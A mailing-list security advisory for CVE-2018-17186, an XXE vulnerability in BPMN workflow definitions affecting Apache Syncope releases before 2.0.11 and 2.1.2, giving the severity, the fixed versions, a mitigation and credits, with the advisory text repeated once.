Francesco Chicchiriccò
2018-11-06 09:05:59 UTC
CVE-2018-17186: XXE on BPMN definitions
Description:
An administrator with workflow definition entitlements can use DTD to
perform malicious operations, including but not limited to file read,
file write, and code execution.
Severity: Medium
Vendor: The Apache Software Foundation
Affects:
Releases prior to 2.1.2
Releases prior to 2.0.11
The unsupported Releases 1.2.x may be also affected.
Solution:
2.0.X users should upgrade to 2.0.11
2.1.X users should upgrade to 2.1.2
Mitigation:
Do not assign workflow definition entitlements to any administrator.
Credit:
This issue was discovered by Kevin Borras Soler and Joan Bono.
References:
https://syncope.apache.org/security
Description:
An administrator with workflow definition entitlements can use DTD to
perform malicious operations, including but not limited to file read,
file write, and code execution.
Severity: Medium
Vendor: The Apache Software Foundation
Affects:
Releases prior to 2.1.2
Releases prior to 2.0.11
The unsupported Releases 1.2.x may be also affected.
Solution:
2.0.X users should upgrade to 2.0.11
2.1.X users should upgrade to 2.1.2
Mitigation:
Do not assign workflow definition entitlements to any administrator.
Credit:
This issue was discovered by Kevin Borras Soler and Joan Bono.
References:
https://syncope.apache.org/security